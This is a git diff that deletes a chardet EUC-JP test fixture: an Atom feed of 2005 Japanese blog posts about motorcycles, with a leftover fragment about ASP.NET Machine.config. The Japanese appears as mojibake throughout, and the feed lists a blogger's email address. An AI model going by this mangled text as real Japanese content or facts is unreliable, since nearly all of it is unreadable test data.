    Machine.config ₪ַµ¯ֶ°₪¹₪כ¥ז¡¼¥¶₪ע»״ִך₪¹₪כ₪ֻ₪ֿ¥ױ¥¡¥₪¥כ₪ֻ»ס³¾נף(₪₪₪ן₪ז₪כ¥ׁ¥¹¥ן¡¼¥ֹ)₪עְ¸₪ַ½ס₪¯₪«¡¢»ס³¾נף₪ע¸מ₪·₪¿¾ץֲײ₪ֻ₪·₪ֶ»״ִך₪¹₪כ₪«₪₪־₪ַ₪¹₪¬¡¢¥ׁ¥¹¥ן¡¼¥ְֹ¸₪ֿ₪₪¥ה₪¹₪®₪ַ₪¹₪·¡¢¸מ₪¹₪כ₪־₪גֵּּ₪ַ₪¹(¥³¥¥ף¥ֹ°ל²ף₪ָ₪ֿ₪₪₪¨ִ¶ֵּּ₪¯₪µ₪¬₪ך₪₪־₪ַ)¡£₪ָ₪₪₪¦₪«¡¢₪½₪ג₪½₪ג Machine.config ₪ָ₪«₪₪₪¸₪ך₪¿₪¯₪₪₪₪־₪ַ₪¹₪ט!

    -

    ₪ֱ₪₪₪ֻ³ֶ¼ן»ס³¾נף(SQL Serverְֲ³¸»ת־ף₪ָ₪«₪ג´₪א)₪ע°ֵ¹ז²½₪·₪ֶ¸מ₪¹₪כ‎ֻ¡₪ֿMSKB₪־ ASP.NET ¥ז¡¼¥ֶ¥£¥ך¥ֶ¥£₪ע»ָֽׁ₪·₪ֶ»ס³¾נף₪×₪ט₪׃¥»¥ֳ¥·¥ח¥ף¾ץֲײ₪־ְֲ³¸»ת־ף₪ע°ֵ¹ז²½₪¹₪כ‎ֻ¡(329290) ₪ע»²¾ָ₪־₪³₪ָ¡£

    -

    ₪³₪ל₪¬W2k3(₪ג₪·₪¯₪ֿWindows XP x64 Edition)₪־IIS 6₪₪י¡¢aspnet_wp.exe ₪ֱֻךֵצ₪¹₪כ w3wp.exe ₪עIIS¥¥ֽ¡¼¥¸¥ד₪«₪י´ֳ±₪ֵֻ¬ֵצ₪¥¢¥«¥¦¥ף¥ָ₪ַ¼ֲ¹װ₪ַ₪­₪₪¹¡£

    -]]>
    -
    - - -
    diff --git a/chardet/tests/EUC-JP/motors.sytes.net.xml b/chardet/tests/EUC-JP/motors.sytes.net.xml deleted file mode 100644 index 13f6055..0000000 --- a/chardet/tests/EUC-JP/motors.sytes.net.xml +++ /dev/null @@ -1,527 +0,0 @@ - - - -₪₪ף₪ֽ₪ף₪µ₪ף₪־ְ°ָקֶ»ן - -2005-11-22T11:46:18Z -By Nishio Motors -tag:motors.sytes.net,2005:/nishio//1 -Movable Type -Copyright (c) 2005, mannen - -²ֲָ²־¹¹װ - -2005-11-22T11:46:18Z -2005-08-22T10:38:25Z -tag:motors.sytes.net,2005:/nishio//1.352 -2005-08-22T10:38:25Z -ְ־¡¢₪¢₪כ»¨»ן₪ֻ¡¢½ס₪«₪ל₪ֶ₪¢₪ֳ₪¿¡£ ¡ײ¥ֿ¡¼¥ל¡¼₪ֿ₪¿₪ְ₪־µ¡³£₪ַ₪ֿ₪₪₪¡£¥ֿ¡¼¥ל¡¼₪ע¼ך₪ֻ... - -mannen - -ma240nishio@docomo.ne.jp - -»¨µ­ - -ְ־¡¢₪¢₪כ»¨»ן₪ֻ¡¢½ס₪«₪ל₪ֶ₪¢₪ֳ₪¿¡£
    -¡ײ¥ֿ¡¼¥ל¡¼₪ֿ₪¿₪ְ₪־µ¡³£₪ַ₪ֿ₪₪₪¡£¥ֿ¡¼¥ל¡¼₪ע¼ך₪ֶֻ‏₪ל₪כ₪ָ¡¢¥ֿ¡¼¥ל¡¼₪עֳז¿´₪ֻ₪₪₪ם₪₪₪ם₪₪³₪ָ₪¬²ף₪ך»ֿ₪ב₪כ¡£¡׳

    - -


    -½ש¡¹₪ֻ₪½₪־¸ְֽױ₪־°ױּ£₪עֽ‎²ע₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪¿¡£
    -ַ¯־נ¡¢¿¦¶ָ₪₪ֹ°לְ₪־»צ₪עָ´₪­₪ֻ₪·₪ֶ¡¢₪¿₪ְ¥ֿ¡¼¥ל¡¼₪ע¾ט₪ֳ₪ֶ₪₪₪כ₪ָ¸ְ₪¦₪ְ₪±₪ַ¡¢₪¹₪°₪ֻ₪¦₪ֱ²ע₪±₪ֳֶח־ֹ₪¯₪₪ֳ₪ֶ₪·₪₪¦¡£

    - -

    ₪µ₪י₪ֻ¡¢²¿₪¬²ף₪ך»ֿ₪ב₪¿₪«₪ָ¸ְ₪¨₪׀¡ײ»ה¼«¿ָ¡׳₪¬°לָײ²ף₪ך»ֿ₪ב₪¿₪־₪ְ₪ם₪¦¡£¡¾׀
    -¥ׁ¥½¥³¥ף₪ַ¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ₪ע»ֿ₪ב₪¿₪־₪ג¡¢¼ח₪ֻ¥ֿ¡¼¥ל¡¼₪־¾נף₪עְֶ₪כ₪¿₪ב₪ְ₪ֳ₪¿¡¢¥ײ¥ם¥°₪ַ¾נףָ¯¿®₪¹₪כ₪־₪ג¼ח₪ֻ¥ֿ¡¼¥ל¡¼¾ט₪ך₪־ֳח´ײ₪ָ¸ע¿®₪¹₪כ₪¿₪ב₪ְ¡£

    - -

    - -

    ּ´ֳז₪ֻ₪₪ך₪¹₪®₪¿»ה₪ֿ¡¢ֻטַ¯¡¢¥ִ¡¼¥ך¥ף¥°₪ֻ₪ֿ¹װ₪¯₪ג₪־₪־¡¢₪³₪³£²¡₪£³ַ¯²ֲָ²־¹¹װ₪ֻ¹װ₪¯₪־₪עֻ÷₪ל₪ֶ₪·₪₪ֳ₪ֶ₪₪₪¿₪־₪ְ¡£
    -»ׂ¶¡₪ג¾®³״ְ¸÷ַ¸ו₪־²ֶµ₪₪ָ₪₪₪¦₪³₪ָ₪ַ¡¢₪ִ₪₪₪ֻ¡¢²ַ₪־¡ײֵ₪ך¡׳₪¬־צ₪·₪ֶ₪·₪₪ֳ₪¿¡£

    - -

    ₪ָ₪₪₪¦₪³₪ָ₪ְֶַּ₪«₪י»ֵ»צ₪עµ₪ף₪ַ¡ײ²ֲָ²־¹¹װ¡׳₪ֻ¹װ₪ֳ₪ֶ₪­₪¡ֱ₪¹¡£¡°¡°

    - -


    -¡ײ₪¿₪·₪«₪ֻ¡¢¥ֿ¡¼¥ל¡¼₪עֳז¿´₪ָ₪·₪ֶ₪₪₪ם₪₪₪ם₪₪³₪ָ₪¬²ף₪ך»ֿ₪ב₪¿¡£¡׳
    -₪·₪«₪·¡¢₪ֹ₪־₪ט₪¦₪ֻ²ף₪¹₪«₪ֿ¾ט₪ך¼ך₪·₪ְ₪₪₪₪־₪ְ₪ם₪¦¡£₪½₪־₪³₪ָ₪ג÷ַ¶ב₪ט₪¦₪ה₪¯¬₪«₪ֳ₪ֶ₪­₪¿₪ט₪¦₪µ₪₪¬₪¹₪כ¡£(^_^;)

    ]]> - -
    -
    - -¥¹¥÷¥­¡¡£ׂ£ַ£²£µ£°¦ֳ¡¥¬¥ף¥¡¼¡ֻ­¸·¿ - -2005-11-22T11:46:18Z -2005-08-21T00:19:45Z -tag:motors.sytes.net,2005:/nishio//1.351 -2005-08-21T00:19:45Z -­µ·¿¥¬¥ף¥¡¼₪־¼¡₪ֿ­¸·¿¥¬¥ף¥¡¼₪ַ₪·₪¿¡£ ֽ§¿ֽ₪־²ס¼ׂ₪־¸וַ₪ט₪ךֶֻ¼ע°לֻ₪ַ¾ש₪ך¼ץ₪±... - -mannen - -ma240nishio@docomo.ne.jp - -¾ט₪ֳ₪¿₪³₪ָ₪¬₪¢₪כ¥׀¥₪¥¯ - -­µ·¿¥¬¥ף¥¡¼₪־¼¡₪ֿ­¸·¿¥¬¥ף¥¡¼₪ַ₪·₪¿¡£

    -

    ֽ§¿ֽ₪־²ס¼ׂ₪־¸וַ₪ט₪ךֶֻ¼ע°לֻ₪ַ¾ש₪ך¼ץ₪±₪₪·₪¿¡£

    -

    ֱצ¹װµק־¥₪ג¾¯₪₪¯³°ֱץ₪־ִרֵ₪ג־ֹ₪«₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢¥¨¥ף¥¸¥ף₪¬¾ֶ₪­ֹױ₪₪₪ֶ₪×₪ך₪₪·₪¿¡£

    -

    ₪ג₪ֱ₪ם₪ף¥¨¥ף¥¸¥ף₪¬¾ֶ₪­ֹױ₪₪₪ֶ₪₪₪כ₪³₪ָ₪ֿ÷ַ½י₪«₪י־»¾µ÷ׁ₪₪ְ₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢½₪ֽ‎₪¹₪כ₪ֻ₪ֿ·כ¹½¼ך´ײ₪¬₪«₪«₪ֳ₪¿₪ט₪¦₪ֻµ­²±₪·₪ֶ₪×₪ך₪₪¹¡£

    -

    £²¥µ¥₪¥¯¥כ¼ײ₪־¾ל¹ח¥¨¥ף¥¸¥ף₪ע²ף₪·₪¹₪®₪כ₪ָ¥׳¥י¥¹¥ֶ¥£¥ֳ¥¯ְ½₪־¥×¥₪¥כ¥¥ף¥׳₪־¥®¥ה₪־»³₪¬ָפ₪׃¥¨¥ף¥¸¥ף₪ֻ¥×¥₪¥כ₪¬¶¡µכ₪µ₪ל₪₪¯₪₪ך¾ֶ₪­ֹױ₪₪₪ֶ₪·₪₪¦₪³₪ָ₪¬־ֹ₪¯₪¢₪ך₪₪·₪¿¡£

    -

    ₪³₪־¥×¥₪¥כ¥¥ף¥׳₪־¥®¥ה₪ַ₪¹₪¬¡¢¥¯¥י¥ף¥¯¥±¡¼¥¹₪ע³ה₪י₪₪₪₪ָ¸ע´¹₪ַ₪­₪₪»₪ף₪ַ₪·₪¿¡£¹¹₪ֻ¡¢¥·¥ך¥ף¥ְ¡¼₪ע¥¡¼¥ך¥ף¥°₪·₪ֶ£°¡¥£°£µ£ױ£נ¥µ¥₪¥÷₪־¥װ¥¹¥ָ¥ף₪ֶֻ‏₪לֲ״₪¨₪ט₪¦₪ה₪¯ֱצ₪כ»צ₪¬₪ַ₪­₪₪·₪¿¡£

    -

    ₪³₪־­¸·¿₪ַ₪גֻ÷₪ל₪י₪ל₪₪₪»׳₪₪½׀₪¬₪¢₪ך₪₪¹¡£

    -

    ­¸·¿₪ַ½י₪ב₪ֶ₪־¥ִ¡¼¥ך¥ף¥°₪־»‏₪ַ₪·₪¿¡£²ָ₪ע½׀₪ֶ₪ן₪÷₪«£³£°¬¸ו¡¢ֱ°₪עֱצ₪כ¥י¥₪¥ְ¡¼₪¿₪ֱ₪ִֹֻ₪₪₪ִ₪³₪¦₪ָ»׳₪₪¥¹¥װ¡¼¥ֹ₪ע¾ו₪²₪ֶ¥³¡¼¥¡¼₪ֶֻֽ₪ֳ¹‏₪א₪ָ¡¢₪₪₪­₪₪ך¥ױ¥ם¥ף¥ָ₪¬³ך₪ךֵ¾ֵ₪·₪ֶ₪·₪₪₪₪₪·₪¿¡£²ףֵ¾₪·₪₪¬₪יֵ¾₪¬₪ֳ₪ֶ₪₪₪¯»‏¡¢¸ו₪ם₪«₪יֽט₪¿£´־״₪ֻ₪ׂ₪«₪ל₪½₪¦₪ֻ₪₪ךֹ₪₪»׳₪₪₪ע₪·₪₪·₪¿¡£

    -

    ¥¿¥₪¥ה₪¬¸ֵ₪«₪ֳ₪¿₪־₪ַ¥´¥א₪¬¹ֵ²½₪·₪ֶ₪₪₪¿₪־₪¬¸¶°ר₪ַ₪¹¡£

    -

    ¡ײ¥±¥ֱ₪י₪÷₪ֻ¥¿¥₪¥ה₪ג¸ע´¹₪·₪ֶ₪×₪±₪׀־ֹ₪«₪ֳ₪¿¡£¡׳₪ָ»׳₪ֳ₪ֶ₪ג¸ו₪־÷׳₪ך₪ַ₪·₪¿¡£

    -

    ₪³₪־­¸·¿₪ַ₪¹₪¬¥¨¥ף¥¸¥ף₪ֿ­µ·¿₪ָּ×₪ִַדֳזֲ®¥ָ¥כ¥¯₪¬³ֳ₪ְֲֻ₪¯₪₪ך¾ט₪ך₪ה₪¹₪¯₪₪ֳ₪ֶ₪₪·₪¿¡£

    ]]> - -
    -
    - -¥¹¥÷¥­¡¡£ׂ£ַ£²£µ£°¦ֳ¡¥¬¥ף¥¡¼¡ֻ­µ·¿ - -2005-11-22T11:46:17Z -2005-08-20T11:26:35Z -tag:motors.sytes.net,2005:/nishio//1.350 -2005-08-20T11:26:35Z -₪³₪־¥׀¥₪¥¯₪¬ֵ׀¾ל₪¬¡¢¥«¥¦¥כֹױ₪­¥׀¥₪¥¯»‏ֲו₪־ֻ¬₪ל₪ַ₪·₪¿¡£»¨»ן₪ֻ₪ֿ¸״₪י₪·₪²₪ֻ¡ײ־ּ»÷¼ײ... - -mannen - -ma240nishio@docomo.ne.jp - -¾ט₪ֳ₪¿₪³₪ָ₪¬₪¢₪כ¥׀¥₪¥¯ - -₪³₪־¥׀¥₪¥¯₪¬ֵ׀¾ל₪¬¡¢¥«¥¦¥כֹױ₪­¥׀¥₪¥¯»‏ֲו₪־ֻ¬₪ל₪ַ₪·₪¿¡£»¨»ן₪ֻ₪ֿ¸״₪י₪·₪²₪ֻ¡ײ־ּ»÷¼ײ½י₪־¥¢¥כ¥¥ױ¥ל¡¼¥א¡׳₪עׂ¼ך₪ֵַ·₪ֻ·ַ₪²₪כ¡¢³«ָ¯¼װ₪־»ׁ₪¬₪¢₪ך₪₪·₪¿¡£

    -

    ִדֲ®₪ע´°ֱ´₪ֻּµ»כ₪·₪ֶ¥¯¥י¥¹÷ַ¹ג₪־£´£µps₪עְֶ₪¿¡ײ₪¸₪ד₪¸₪דַֿ¡׳₪ֿ¥װ¡¼¥­¡¼₪ַ¡¢¥ױ¥ם¥ף¥ָ£±£¶¥₪¥ף¥ֱ¡¢¥ך¥ה£±£¸¥₪¥ף¥ֱ₪־₪־₪¢₪כֱא½ְִ­₪ָ₪ג₪¢₪₪₪₪ֳ₪ֶ¡¢¾ט₪ך₪³₪₪¹₪־₪ֿ₪«₪₪ך₪־¥ֶ¥¯¥ֻ¥ֳ¥¯₪עֹ¬ֽ׳₪ָ₪·₪₪·₪¿¡£

    -

    »ה₪¬₪³₪־­µ·¿¥¬¥ף¥¡¼₪ע¼ך₪ֻ₪·₪¿₪־₪ֿ¡¢₪¹₪ַ₪ֻ¥«¥¦¥כֹױ₪­¥׀¥₪¥¯₪־¿ֽµ₪₪ֻ±¢₪ך₪¬½׀₪ֶ₪­₪¿÷¢₪ַ₪·₪¿¡£

    -

    ³־₪«ֹפֹ¼ט₪ך¼ײ₪ע´₪ב£³ֲז₪ַ£µֻ±₪ֳַ־₪ך¹ח₪₪₪ט₪ך¾ש₪ך¼ץ₪±₪₪·₪¿¡£

    -

    ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡

    -

    ₪³₪־¥׀¥₪¥¯₪ַֻ÷₪ל₪י₪ל₪₪₪»׳₪₪½׀₪¬₪¢₪ך₪₪¹¡£

    -

    ¹גֲ®ֶ»ֿ©₪עֱצ¹װֳז₪־»צ₪ַ₪·₪¿¡£

    -

    ֹװ°ױ₪ֻ¡¢₪´ֿ·ֲ־₪־¥¬¥ף¥¡¼·¯₪־¥¨¥ף¥¸¥ף₪־¥ל¥¹¥¥ף¥¹₪¬־ֹ₪¯₪₪ך¡¢ֹ₪₪₪₪ֹ²ֲֳ®₪ע₪·»ֿ₪ב₪₪·₪¿¡£

    -

    ¡ײ₪½₪ם₪½₪ם¥¥ױ¥י¡¼₪¬¾ֶ₪±₪ֶ₪­₪¿₪־₪ַ¥«¡¼¥¥ף₪¬₪ָ₪ל₪ֶ₪­₪¿₪־₪ְ₪ם₪¦¡£*1¡׳»ה₪ֿ¥״¥כ¥ב¥ֳ¥ָ₪־ֳז₪ַ₪ֻ₪ף₪₪ך¾׀₪₪₪₪·₪¿¡£

    -

    ₪·₪«₪·₪½₪־£³£°ֳֹ¸ו₪ֻ¥¨¥ף¥¸¥ף₪¬¾ֶ₪­ֹױ₪₪₪ֶ₪·₪₪ֳ₪¿₪־₪ַ₪¹¡£

    -

    ¸¶°ר₪ֿ½יגֵ×₪₪³₪ָ₪ַ¡¢¥×¥₪¥כ¥י¥ף¥׳₪־µו₪¬ְ₪ל₪ֶ₪₪₪¿₪«₪י₪ַ₪·₪¿¡£

    -

    ₪½₪־¸ו¥¥₪¥כ¥ֹ₪ֻ₪₪ֳ₪ֶ₪₪₪ֳ₪¿¥¬¥ף¥¡¼₪ַ₪¹₪¬¡¢­µ·¿¥¬¥ף¥¡¼₪ֿ£²¥µ¥₪¥¯¥כ₪י₪·₪¯₪ֶ÷ַ¹ג₪ַֻּּע₪₪¥׀¥₪¥¯₪ַ₪·₪¿¡£

    -
      -
    • *1: ¼ֲ÷₪ֿ¥·¥ך¥ף¥ְ₪־¥×¥₪¥כ₪־ּ‎ֻל₪¬ְ₪ל°ל»‏ֵ×₪ֻ¥ױ¥ך¥¯¥·¥ח¥ף₪¬¾¯₪₪¯₪₪ֳ₪¿₪¿₪ב
    • -
    ]]> - -
    -
    - -¥ה¥¥ֿ¡¡£װ££ׂ£²£µ£° - -2005-11-22T11:46:17Z -2005-08-19T10:44:37Z -tag:motors.sytes.net,2005:/nishio//1.349 -2005-08-19T10:44:37Z -ֲחי®ְ²ֹ§¸¶÷מ₪־¡ײ±ר₪ל₪¿±ֽׁ÷¡׳₪ֳ₪ֶ±ַ²ט¡¢ֳ־₪ֳ₪ֶ₪₪¹₪«¡© ¡ײ₪·₪י₪₪₪¡׳ ₪½₪ך₪ד₪½₪¦₪ַ... - -mannen - -ma240nishio@docomo.ne.jp - -¾ט₪ֳ₪¿₪³₪ָ₪¬₪¢₪כ¥׀¥₪¥¯ - -ֲחי®ְ²ֹ§¸¶÷מ₪־¡ײ±ר₪ל₪¿±ֽׁ÷¡׳₪ֳ₪ֶ±ַ²ט¡¢ֳ־₪ֳ₪ֶ₪₪¹₪«¡©

    -

    ¡ײ₪·₪י₪₪₪¡׳

    -

    ₪½₪ך₪ד₪½₪¦₪ַ₪·₪ח₪¦¡¢₪₪ף₪¿₪ֳ₪ֶ¡ײ₪×₪ֳ₪ֱ₪ד₪ף¥י¥₪¥ְ¡¼¡׳₪¬ְִ½ױ₪־»‏₪־±ַ²ט₪ַ₪¹₪«₪י¡¦¡¦¡¦¡¦¡¾׀

    -

    ֶף־״₪־¥ל¡¼¥µ¡¼₪¬¼ח¿ֽ¸ר₪־±ַ²ט₪ְ₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢¼ח¿ֽ¸ר₪־¡ײֵ·÷ֽ¥י¥₪¥ְ¡¼ֻּּמ¾½ֹ׳¡׳₪־ּע₪ע¡ײֱנ´¢ְµֽ÷¡׳¡₪³₪־¿ֽ₪ג½י¼×₪«₪¡©¡ֻ₪¬₪·₪ֶ₪₪₪₪·₪¿¡£

    -

    ¡ײֱנ´¢ְµֽ÷¡׳₪ַֿ׀ֽ¥₪₪־₪ַ¥µ¡¼¥­¥ֳ¥ָ₪ע₪ײ₪ֳ₪ָ₪ײ₪³₪ָ₪¬₪ַ₪­₪₪₪¡£₪½₪³₪ַ¥¹¥¿¥ף¥ָ₪ָ₪·₪ֵֶצ»‏₪־¿ֽµ₪¥ל¡¼¥µ¡¼¡ײ¿ֳיֹ§¡׳¡₪ג₪ֱ₪ם₪ף¹₪₪₪¿₪³₪ָ₪¬₪₪₪₪ַ₪·₪ח₪¦¡©¡ֻ₪¬½׀±י₪·₪ֶ₪₪₪¿₪־₪ַ₪¹¡£

    -

    ־כ¼¯£¸ֲׁ₪ע¥±¥ֻ¡¼¡¦¥ם¥׀¡¼¥ִ₪ֱָָ₪ף₪ַֽ¥¾¡₪·₪¿₪³₪ָ₪ג₪¢₪ך,₪ָ₪ֻ₪«₪¯ֱ´¹ס₪־¥י¥₪¥ְ¡¼₪־¡״ֶ´₪ל₪־₪₪ָ¡₪ַ₪·₪¿¡£

    -

    ₪½₪־¡ײ¿¡׳₪¬¾ט₪ֳ₪ֶ₪₪₪¿£££ׂ₪־¥ל¥׳¥ך¥«¥ג¥ַ¥כ£²£µ£°ccַָ₪¬£װ££ׂ£²£µ£°₪ְ₪ֳ₪¿₪־₪ַ₪¹¡£

    -

    ¥ױ¥כ¥«¥¦¥כ₪־ִל₪¬ֿ©ּּ₪ָ₪³₪¹₪ל₪כ₪°₪י₪₪ֵ₪·₪ֶ₪ג¡¢°ֲִך₪·₪ֶ₪₪₪ֶ¡¢₪½₪ל₪₪ַ₪־¥׀¥₪¥¯₪ָָז₪₪כ₪ָ¡¢¥¨¥ף¥¸¥ף¥ׁ¥ן¡¼₪ה·₪¯¶¯ֵ₪־₪¢₪כ¼ײֲ־₪ַ¡¢ֲ®₪¯ֱצ₪כ₪³₪ָ₪ֻ´״₪·₪ֶ₪ֿ¼¡¸µ₪¬°ד₪₪₪₪·₪¿¡£

    -

    ₪½₪־¸ו£װ££ׂ₪־¥¨¥ף¥¸¥ף₪ֿ¸ו‎ַ׃µ₪¡¢£ײ·¿₪״₪ָ¿²½₪·₪ֶ₪₪₪­₪₪·₪¿₪¬¡¢¿ֽµ₪¥ל¡¼¥µ¡¼₪־°תֲא₪ָ¶¦₪ֻ¥ײ¡¼¥א₪ֿµמ₪ך¡¢₪³₪־¼ך₪־¥׀¥₪¥¯₪־¿ֽµ₪₪גֽמ₪ֱּ₪ֻ₪₪ֳ₪ֶ¹װ₪­₪₪·₪¿¡£¡ֲח·¿¼ײ₪ֿ÷£₪ַ₪ג°לֹפ¥¥ֻ¥¢₪ֻ¿ֽµ₪₪ַ₪¹₪¬¡¦¡¦¡¦¡ֻ

    -

    ₪ָ₪³₪ם₪ַ¡¢¿₪µ₪ף₪ֿ÷£₪ַ₪ג¥׀¥₪¥¯₪ֻ¾ט₪ֳ₪ֶ₪×₪י₪ל₪כ₪־₪ַ₪·₪ח₪¦₪«¡©¾ט₪ֳ₪ֶ₪₪₪כ₪ָ₪¹₪ל₪׀₪ה₪ֿ₪ך¥«¥¦¥כֹױ₪­¡©₪¦¡ֱ₪ף¡£₪₪µ₪«¥ֿ¡¼¥ל¡¼₪ֳ₪ֶ»צ₪ֿ₪₪₪₪ַ₪·₪ח₪¦₪ֽ¡ֱ¡©¡¾׀

    ]]> - -
    -
    - -¿¶ֶ° - -2005-11-22T11:46:17Z -2005-08-17T10:39:46Z -tag:motors.sytes.net,2005:/nishio//1.348 -2005-08-17T10:39:46Z -ֳח´ײ₪־°ל¿ֽ₪¬ַ÷₪ף₪ַ₪₪₪כ¡£ ¡ײ¥ִ¡¼¥ך¥ף¥°¹װ₪¯₪ָֹ¬₪÷₪ֹ₪³₪«₪¬²ץ₪ל₪ֶ₪·₪₪¦¡£₪₪₪ֳ₪¿₪₪₪ֹ... - -mannen - -ma240nishio@docomo.ne.jp - -¥ָ¥י¥ײ¥כ - -ֳח´ײ₪־°ל¿ֽ₪¬ַ÷₪ף₪ַ₪₪₪כ¡£

    -

    ¡ײ¥ִ¡¼¥ך¥ף¥°¹װ₪¯₪ָֹ¬₪÷₪ֹ₪³₪«₪¬²ץ₪ל₪ֶ₪·₪₪¦¡£₪₪₪ֳ₪¿₪₪₪ֹ₪¦₪·₪¿₪ג₪־₪«¡©¡׳

    -

    ¥ָ¥י¥ײ¥כ₪־₪₪ָ₪ף₪ֹ₪ֿ₪½₪־ְ¨₪₪¸₪₪¿¶ֶ°₪ֻµ¯°ר₪¹₪כ¡£

    -

    ₪ֹ₪ל₪₪ֹ₪־₪ג₪־₪«¾ׂ²נ₪·₪ֶ₪₪ט₪¦¡£¡£¡£¡¼ײ־¾₪ֿ¥¨¥¥׃¥ֳ¥¯¥ִ¥₪¥ף₪־¥«¥¹¥¿¥א₪ַ₪¹¡£¡ֻ

    -

    ¡¥¬¥½¥ך¥ף¥¿¥ף¥¯¡

    -

    ¥¢¥כ¥ְ½₪ֻ¸ע´¹₪·₪ֶ₪¢₪כ₪־₪ְ₪¬¡¢²בµמ₪ֻ£´¡₪£µ²ףֿ¢ֲ³₪ַ³ה₪ל₪ֶ₪·₪₪ֳ₪¿¡£₪½₪־₪¿₪׃₪ֻ¥¢¥כ¥´¥ףְֽֿ¡¢ה¶¯¡¢÷ֱֵֶֹץ¡¢₪ע·«₪ךײ₪·₪¿¡£¥·¥ח¥ֳ¥¯₪ע¼ץ₪±₪ֶ₪₪₪כֳח´ײ₪ע¸«₪ֶ¸¶°ר₪עֳµ₪ֳ₪ֶ₪₪כ₪ָ¡¢¥¿¥ף¥¯₪־°לֹפ₪¬₪¸₪«₪ֻ¼ײֲ־₪ְֻ¿¨₪·₪ֶ₪₪₪¿¡£¥י¥׀¡¼₪ע₪ױ₪ף₪ְ₪ף₪ֻ»ָ₪₪¼ט₪ךֹױ₪±‎ֻ¡₪עׁ¹¹₪¹₪כ₪³₪ָ₪ַ÷ֶָ¯₪ֿ₪₪¯₪₪ֳ₪¿¡£

    -

    ¡¥¥י¡¼¡¡ֳֶ₪ֻ÷¸ֲ¦¡ֻ

    -

    ¹ג²ֱ₪¡£²ֻ±°¾ו¡ֻ¥¢¥ל¥ף¥ֽ¥¹ְ½¥¥י¡¼₪¬¹גֲ®ֶ»ֿ©₪עֱצ¹װֳז₪ְֻ₪ל¡¢°ל½ײ₪ֻ₪·₪ֶ¸ו‎₪ָֻפ₪ף₪ַ₪₪₪ֳ₪ֶ₪·₪₪ֳ₪¿¡£¹¹₪ֻ´ט¾ז₪½₪¦₪¥¥י¡¼₪עֹױ₪±₪ֶ₪ג₪ֽ₪¸»³₪¬₪ָ₪ף₪ַ₪·₪₪¦¡£

    -

    ₪ֹ₪¦₪ג₪×₪·₪ד₪ל₪¥¥י¡¼₪ֿ¶¯־ץ₪¿¶ֶ°₪ֲֻׁ₪¨₪כ₪³₪ָ₪¬₪ַ₪­₪₪₪₪ט₪¦₪ְ¡£

    -

    ¡¥ױ¥ל¡¼¥א¡

    -

    ¥ױ¥ל¡¼¥א₪ַ₪µ₪¨ֲׁ₪¨₪כ₪³₪ָ₪¬₪ַ₪­₪₪₪¡£¥·¡¼¥ָ₪־²¼₪־ְֹֽֿפ¬₪ג³ה₪ל₪ֶ₪·₪₪ֳ₪¿¡£¡£²²ף¡ֻ

    -

    ¡¥¥ױ¥י¡¼¡

    -

    ¥¹¡¼¥ׁ¡¼¥ָ¥י¥ֳ¥׳₪־¥־¡¼¥¥כ¥¹¥ֶ¡¼₪ֿ₪¹₪°₪ְֻ₪ל₪ֶ₪·₪₪ֳ₪¿¡£

    -

    ₪³₪־ֱ°₪־¥ִ¡¼¥ך¥ף¥°₪ַ₪ֿ¥µ¥₪¥ל¥ף¥µ¡¼₪־ְֹֽֿפ₪ג³ה₪ל¡¢₪½₪־₪¿₪בה¶¯₪·₪¿¥¹¥ֶ¡¼₪גְ₪ל₪ֶ₪·₪₪ֳ₪¿¡£

    -

    ¡±¦¼ך¡

    -

    »ה₪¬°לָײ¶ֳ₪₪₪¿₪־₪ֿ¡ײָא¡׳₪־±¦¼ך₪ע¸«₪¿»‏₪ְ₪ֳ₪¿¡£¥¢¥¯¥»¥כ₪ע»‎₪ִ±¦¼ך₪¬ֶג½׀·ל₪ַ¼נ₪ל¾ו₪¬₪ֳ₪ֶ₪₪₪¿₪־₪ְ¡£

    -
    -

    ₪ג₪ֱ₪ם₪ף¥־¡¼¥¥כ₪־¥¨¥¥׃¥ֳ¥°¥ִ¥₪¥ף₪ַ₪ֿ₪³₪ל₪י₪־ֽֽ₪₪³₪ָ₪¬µ¯₪³₪כ₪ֿ₪÷₪¬₪₪₪¡£

    -

    ¾₪·₪₪ֶגֶֽ₪ֹֿװְּ₪ְ₪¬£±£´¡©¡©£ֳ£ֳ₪ֻ¥¥¢¥¢¥ֳ¥׳₪·₪ֶ₪₪₪¿₪־₪ְ₪ֳ₪¿¡£

    -

    ¥¯¥י¥ף¥¯₪־¥׀¥י¥ף¥¹₪¬°­₪₪₪־₪«¡©₪½₪ל₪ָ₪גֱ°¸ו¥·¥ך¥ף¥ְ₪־ַ³¾ֶ₪־¥׀¥י¥ף¥¹₪ֻּהֲך₪¬₪¢₪כ₪־₪«¡©

    -

    ֵ½ֵ₪₪כ¥ָ¥י¥ײ¥כ₪ֲֻׁ₪¨₪ֶ₪₪₪כֳח´ײ₪־־ֿ₪ֻ₪₪ך₪¿₪₪¡×¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡

    -

    ₪·₪«₪·¡¢÷£₪־»ה₪ֻ₪ֿ₪ֹ₪¦₪¹₪כ₪³₪ָ₪ג₪ַ₪­₪₪₪¡£¡¡¡¡¡¡¡¡

    -

    ¡¡¡¡

    -

    ¡ײ₪ָ₪ך₪¢₪¨₪÷¥ך¥¢₪־¥¹¥׳¥ם¥±¥ֳ¥ָ₪ע¾®₪µ₪¯₪·₪ֶ¹גֲ®₪ַ₪־¥¨¥ף¥¸¥ף²ףֵ¾¿פ₪ע²¼₪²₪ֶ₪₪ֶ₪ֿ¡©¡׳¡¡¡¡¡¡¡¡

    -

    ₪½₪¦¸ְ₪¦₪־₪¬ְ÷°לַױ₪ְ₪ֳ₪¿¡£

    ]]> - -
    -
